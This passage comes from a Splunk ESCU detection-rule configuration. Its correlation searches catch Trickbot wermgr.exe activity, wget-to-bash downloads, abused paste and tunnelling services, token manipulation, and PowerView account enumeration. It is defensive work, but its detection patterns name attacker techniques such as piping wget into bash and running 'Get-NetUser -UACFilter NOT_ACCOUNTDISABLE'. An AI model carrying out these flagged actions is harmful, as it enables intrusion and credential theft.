["Trickbot"] action.risk = 1 action.risk.param._risk_message = Wermgr.exe process connecting IP location web services on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wermgr Process Connecting To IP Check Web Services - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1590", "T1590.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is designed to detect suspicious wermgr.exe process that tries to connect to known IP web services. This technique is know for trickbot and other trojan spy malware to recon the infected machine and look for its ip address without so much finger print on the commandline process. Since wermgr.exe is designed for error handling process of windows it is really suspicious that this process is trying to connect to this IP web services cause that maybe cause of some malicious code injection. action.notable.param.rule_title = Wermgr Process Connecting To IP Check Web Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode =22 process_name = wermgr.exe QueryName IN ("*wtfismyip.com", "*checkip.amazonaws.com", "*ipecho.net", "*ipinfo.io", "*api.ipify.org", "*icanhazip.com", "*ip.anysrc.com","*api.ip.sb", "ident.me", "www.myexternalip.com", "*zen.spamhaus.org", "*cbl.abuseat.org", "*b.barracudacentral.org","*dnsbl-1.uceprotect.net", "*spam.dnsbl.sorbs.net") | stats min(_time) as firstTime max(_time) as lastTime count by Image process_name ProcessId QueryName QueryStatus QueryResults EventCode Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_connecting_to_ip_check_web_services_filter` [ESCU - Wermgr Process Create Executable File - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is designed to detect potential malicious wermgr.exe process that drops or create executable file. Since wermgr.exe is an application trigger when error encountered in a process, it is really un ussual to this process to drop executable file. This technique is commonly seen in trickbot malware where it injects it code to this process to execute it malicious behavior like downloading other payload action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = this search is designed to detect potential malicious wermgr.exe process that drops or create executable file. Since wermgr.exe is an application trigger when error encountered in a process, it is really un ussual to this process to drop executable file. This technique is commonly seen in trickbot malware where it injects it code to this process to execute it malicious behavior like downloading other payload action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances of wermgr.exe may be used. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-19 action.escu.modification_date = 2021-04-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Wermgr Process Create Executable File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot"] action.risk = 1 action.risk.param._risk_message = Wermgr.exe writing executable files on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wermgr Process Create Executable File - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is designed to detect potential malicious wermgr.exe process that drops or create executable file. Since wermgr.exe is an application trigger when error encountered in a process, it is really un ussual to this process to drop executable file. This technique is commonly seen in trickbot malware where it injects it code to this process to execute it malicious behavior like downloading other payload action.notable.param.rule_title = Wermgr Process Create Executable File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=11 process_name = "wermgr.exe" TargetFilename = "*.exe" | stats min(_time) as firstTime max(_time) as lastTime count by Image TargetFilename process_name dest EventCode ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_create_executable_file_filter` [ESCU - Wermgr Process Spawned CMD Or Powershell Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is designed to detect suspicious cmd and powershell process spawned by wermgr.exe process. This suspicious behavior are commonly seen in code injection technique technique like trickbot to execute a shellcode, dll modules to run malicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is designed to detect suspicious cmd and powershell process spawned by wermgr.exe process. This suspicious behavior are commonly seen in code injection technique technique like trickbot to execute a shellcode, dll modules to run malicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-19 action.escu.modification_date = 2021-04-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Wermgr Process Spawned CMD Or Powershell Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "Qakbot"] action.risk = 1 action.risk.param._risk_message = Wermgr.exe spawning suspicious processes on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wermgr Process Spawned CMD Or Powershell Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "Qakbot"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is designed to detect suspicious cmd and powershell process spawned by wermgr.exe process. This suspicious behavior are commonly seen in code injection technique technique like trickbot to execute a shellcode, dll modules to run malicious behavior. action.notable.param.rule_title = Wermgr Process Spawned CMD Or Powershell Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as cmdline min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name = "wermgr.exe" `process_cmd` OR `process_powershell` by Processes.parent_process_name Processes.original_file_name Processes.parent_process_id Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_spawned_cmd_or_powershell_process_filter` [ESCU - Wget Download and Bash Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, however filtering may be required. action.escu.creation_date = 2021-12-11 action.escu.modification_date = 2021-12-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Wget Download and Bash Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wget Download and Bash Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. action.notable.param.rule_title = Wget Download and Bash Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wget (Processes.process="*-q *" OR Processes.process="*--quiet*" AND Processes.process="*-O- *") OR (Processes.process="*|*" AND Processes.process="*bash*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wget_download_and_bash_execution_filter` [ESCU - Windows Abused Web Services - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, internet via secure tunneling,instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1102"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, internet via secure tunneling,instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.escu.how_to_implement = This detection relies on sysmon logs with the Event ID 22, DNS Query. We suggest you run this detection at least once a day over the last 14 days. action.escu.known_false_positives = Noise and false positive can be seen if the following instant messaging is allowed to use within corporate network. In this case, a filter is needed. action.escu.creation_date = 2023-09-20 action.escu.modification_date = 2023-09-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Abused Web Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["NjRAT"] action.risk = 1 action.risk.param._risk_message = a network connection on known abused web services from $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Abused Web Services - Rule action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1102"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, internet via secure tunneling,instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.notable.param.rule_title = Windows Abused Web Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 QueryName IN ("*pastebin*",""*textbin*"", "*ngrok.io*", "*discord*", "*duckdns.org*", "*pasteio.com*") | stats count min(_time) as firstTime max(_time) as lastTime by Image QueryName QueryStatus process_name QueryResults Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_abused_web_services_filter` [ESCU - Windows Access Token Manipulation SeDebugPrivilege - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious process enabling the "SeDebugPrivilege" privilege token. SeDebugPrivilege allows a process to inspect and adjust the memory of other processes, and has long been a security concern. SeDebugPrivilege allows the token bearer to access any process or thread, regardless of security descriptors, per Palantir. This technique is abused by adversaries to gain debug privileges with their malicious software to be able to access or debug a process to dump credentials or to inject malicious code. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.002", "T1134"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a suspicious process enabling the "SeDebugPrivilege" privilege token. SeDebugPrivilege allows a process to inspect and adjust the memory of other processes, and has long been a security concern. SeDebugPrivilege allows the token bearer to access any process or thread, regardless of security descriptors, per Palantir. This technique is abused by adversaries to gain debug privileges with their malicious software to be able to access or debug a process to dump credentials or to inject malicious code. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4703 EventCode enabled. The Windows TA is also required. action.escu.known_false_positives = Some native binaries and browser applications may request SeDebugPrivilege. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Access Token Manipulation SeDebugPrivilege - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Brute Ratel C4", "AsyncRAT", "DarkGate Malware", "CISA AA23-347A", "PlugX"] action.risk = 1 action.risk.param._risk_message = A process $ProcessName$ adjust its privileges with SeDebugPrivilege on $Computer$. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Access Token Manipulation SeDebugPrivilege - Rule action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4", "AsyncRAT", "DarkGate Malware", "CISA AA23-347A", "PlugX"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.002", "T1134"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4703 EnabledPrivilegeList = "*SeDebugPrivilege*" AND NOT(ProcessName IN ("*\\Program File*", "*\\System32\\lsass.exe*", "*\\SysWOW64\\lsass.exe*", "*\\SysWOW64\\svchost.exe*", "*\\System32\\svchost.exe*")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer ProcessName ProcessId SubjectDomainName SubjectUserName SubjectUserSid TargetUserName TargetLogonId TargetDomainName EnabledPrivilegeList action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_manipulation_sedebugprivilege_filter` [ESCU - Windows Access Token Manipulation Winlogon Duplicate Token Handle - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process requesting access to winlogon.exe attempting to duplicate its handle. This technique was seen in several adversaries to gain privileges for their process. Winlogon.exe is the common targeted process of this technique because it contains high privileges and security tokens. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a process requesting access to winlogon.exe attempting to duplicate its handle. This technique was seen in several adversaries to gain privileges for their process. Winlogon.exe is the common targeted process of this technique because it contains high privileges and security tokens. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = It is possible legitimate applications will request access to winlogon, filter as needed. action.escu.creation_date = 2022-08-24 action.escu.modification_date = 2022-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Access Token Manipulation Winlogon Duplicate Token Handle - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Brute Ratel C4"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Access Token Manipulation Winlogon Duplicate Token Handle - Rule action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 TargetImage IN("*\\system32\\winlogon.exe*", "*\\SysWOW64\\winlogon.exe*") GrantedAccess = 0x1040 | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace dest user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_manipulation_winlogon_duplicate_token_handle_filter` [ESCU - Windows Access Token Winlogon Duplicate Handle In Uncommon Path - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process requesting access in winlogon.exe to duplicate its handle with a non-common or public process source path. This technique was seen where adversaries attempt to gain privileges to their process. This duplicate handle access technique, may refer to a malicious process duplicating the process token of winlogon.exe and using it to a new process instance. Winlogon.exe is the common targeted process of this technique because it contains high privileges and security tokens. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a process requesting access in winlogon.exe to duplicate its handle with a non-common or public process source path. This technique was seen where adversaries attempt to gain privileges to their process. This duplicate handle access technique, may refer to a malicious process duplicating the process token of winlogon.exe and using it to a new process instance. Winlogon.exe is the common targeted process of this technique because it contains high privileges and security tokens. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = It is possible legitimate applications will request access to winlogon, filter as needed. action.escu.creation_date = 2022-08-24 action.escu.modification_date = 2022-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Access Token Winlogon Duplicate Handle In Uncommon Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Brute Ratel C4"] action.risk = 1 action.risk.param._risk_message = A process $SourceImage$ is duplicating the handle token of winlogon.exe on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "SourceImage", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Access Token Winlogon Duplicate Handle In Uncommon Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 TargetImage IN("*\\system32\\winlogon.exe*", "*\\SysWOW64\\winlogon.exe*") AND GrantedAccess = 0x1040 AND NOT (SourceImage IN("C:\\Windows\\*", "C:\\Program File*", "%systemroot%\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_winlogon_duplicate_handle_in_uncommon_path_filter` [ESCU - Windows Account Discovery for None Disable User Account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging to identify the execution of the PowerView PowerShell commandlet Get-NetUser. In the context of PowerView's Get-NetUser cmdlet as a filter or parameter to query Active Directory user accounts that are not disabled. The full script block text based on the CISA-23-347A advisory is "Get-NetUser -UACFilter NOT_ACCOUNTDISABLE". Utilize this query to identify potential suspicious activity of user account enumeration. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging to identify the execution of the PowerView PowerShell commandlet Get-NetUser. In the context of PowerView's Get-NetUser cmdlet as a filter or parameter to query Active Directory user accounts that are not disabled. The full script block text based on the CISA-23-347A advisory is "Get-NetUser -UACFilter NOT_ACCOUNTDISABLE". Utilize this query to identify potential suspicious activity of user account enumeration. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.= action.escu.known_false_positives = Administrators may leverage PowerView for legitimate purposes, filter as needed. action.escu.creation_date = 2023-12-15 action.escu.modification_date = 2023-12-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Account Discovery for None Disable User Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA23-347A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Account Discovery for None Disable User Account - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-NetUser*" ScriptBlockText = "*NOT_ACCOUNTDISABLE*" ScriptBlockText = "*-UACFilter*" | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_account_discovery_for_none_disable_user_account_filter` [ESCU - Windows Account Discovery for Sam Account Name - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event ID 4104 to identify the execution of the PowerView powershell commandlets Get-NetUser. In the context of PowerView's Get-NetUser cmdlet as a filter or parameter to query Active Directory user account's "samccountname". This hunting query is a good pivot to look for suspicious process or malware that gather user account information in a host or within network system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event ID 4104 to identify the execution of the PowerView powershell commandlets Get-NetUser. In the context of PowerView's Get-NetUser cmdlet as a filter or parameter to query Active Directory user account's "samccountname". This hunting query is a good pivot to look for suspicious process or malware that gather user account information in a host or within network system. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.= action.escu.known_false_positives = Administrators may leverage PowerView for legitimate purposes, filter as needed. action.escu.creation_date = 2023-12-15 action.escu.modification_date = 2023-12-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Account Discovery for Sam Account Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Windows Account Discovery for Sam Account Name on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Account Discovery for Sam Account Name - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-NetUser*" ScriptBlockText IN ("*samaccountname*", "*pwdlastset*") | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_account_discovery_for_sam_account_name_filter` [ESCU - Windows Account Discovery With NetUser PreauthNotRequire - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event ID 4104 to identify the execution of the PowerView powershell commandlets Get-NetUser. This technique was observed in the context of PowerView's Get-NetUser cmdlet as a filter or parameter to query Active Directory user accounts that do not require preauthentication for Kerberos. This hunting query is a good pivot to look for suspicious process or malware that gather user account information in a host or within network system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event ID 4104 to identify the execution of the PowerView powershell commandlets Get-NetUser. This technique was observed in the context of PowerView's Get-NetUser cmdlet as a filter or parameter to query Active Directory user accounts that do not require preauthentication for Kerberos. This hunting query is a good pivot to look for suspicious process or malware that gather user account information in a host or within network system. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.= action.escu.known_false_positives = Administrators may leverage PowerView for legitimate purposes, filter as needed. action.escu.creation_date = 2023-12-15 action.escu.modification_date = 2023-12-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Account Discovery With NetUser PreauthNotRequire - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] 